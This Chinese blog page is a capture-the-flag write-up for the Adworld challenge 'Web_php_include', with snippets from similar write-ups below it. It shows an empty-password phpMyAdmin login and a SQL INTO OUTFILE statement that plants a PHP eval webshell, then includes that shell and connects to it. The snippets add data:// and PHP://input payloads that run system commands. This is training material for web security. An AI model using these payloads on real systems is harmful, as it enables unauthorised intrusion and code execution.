攻防世界(高手进阶区)——Web_php_include

最新推荐文章于 2025-08-23 21:23:14 发布
原创 最新推荐文章于 2025-08-23 21:23:14 发布 · 1.8k 阅读 · 6 ·
CC 4.0 BY-SA版权
生活会辜负努力的人,但不会辜负一直努力的人——Leo的个人博客。

本文介绍了一种通过注入一句话木马并利用文件包含漏洞攻破网站的方法。作者使用御剑扫描目录,发现了phpmyadmin面板,通过SQL语句插入木马到/tmp/test.php,再用蚁剑连接获取flag。

做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。
在这里插入图片描述

使用御剑扫一下目录:
在这里插入图片描述
发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接:

一般username与password都为root,但此题的username为root,密码为空;

在SQL处写入一句话木马和文件包含:

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'

点击执行。

用蚁剑连接(注意在URL地址后加?page=/tmp/test.php )
在这里插入图片描述
在第一个文件发现flag
在这里插入图片描述

攻防世界 Web_php_include(include)
Haowill的博客
04-15 1123
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1459
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界-Web_php_include
2301_81434523的博客
07-21 317
最后有一个include函数,但是此时我们并不知道flag在哪个文件当中,或者说并不确定是否有一个flag.php或者flag.txt,于是我们可以通过php伪协议来给变量$page赋值一个php代码,来尝试执行代码。这里注意,php://会被过滤掉,并且这里双写绕不过,因为他是一个循环,在替换之后还会检查,所以我们尝试大小写绕过。或者我们还可以使用data://text/plain协议,这个协议的优点是不用POST传参。并没有显示什么,我们尝试使用bp抓包,重复上述步骤。于是我们继续构造命令。
攻防世界Web_php_include
qq_44111753的博客
11-16 258
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
攻防世界web高手进阶Web_php_include
llx101388627的博客
03-06 312
攻防世界web高手进阶Web_php_include 进入链接,可以看到部分源码: 分析一下,这里可以用GET方式上传两个参数:hello和page 其中,page会先通过strstr(A,B)函数 [在A中查找是否有B] 检查其中是否有"php://",如果有则会通过str_replace(A,B,C)函数 [将C中所有A替换为B] 将"php://"删去。 所以基本上就不可能用php://伪协议 但可以尝试data://text/plain 我们如果要知道flag在哪里,首先得知道有哪些文件 而要
Web_php_include-攻防世界
szhangliwenya的博客
03-25 2357
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 673
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
php一些函数
m0_54015794的博客
01-15 375
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界web进阶Web_php_include
qq_45756971的博客
07-30 410
代码审计后我们会发现存在文件包含漏洞。 借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2} ...
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 594
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。分大小写,stristr()函数不分大小写。 string:必需。规定.
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 418
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
攻防世界---Web_php_include
2201_75556700的博客
04-14 818
6.构造下面url,读取fl4gisisish3r3.php内容。5构造下面url,读取该路径的文件。4.构造下面url,得到目录路径。在网页上显示文本。
攻防世界Web_php_include
最新发布
m0_74979597的博客
08-23 258
题目:Web_php_includePHP文件包含漏洞。
攻防世界web_php_include
qq_60905276的博客
11-12 320
看到题目分析一波什么意思,首先前面Get hello这个参数没用。 要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。 有两种方法。 第一:大写绕过 因为我查到strstr()这个函数是分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。 page=PHP://input 这个命令可以再url上直接输入,也可以在抓包后输入。 先查看文件目录 <php? system("ls");?> 发现文件,再显示文件...
攻防世界Web_php_include
FFFFFFMVPhat的博客
11-22 2211
方法1:
攻防世界(web)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 4010
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LEO-max

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值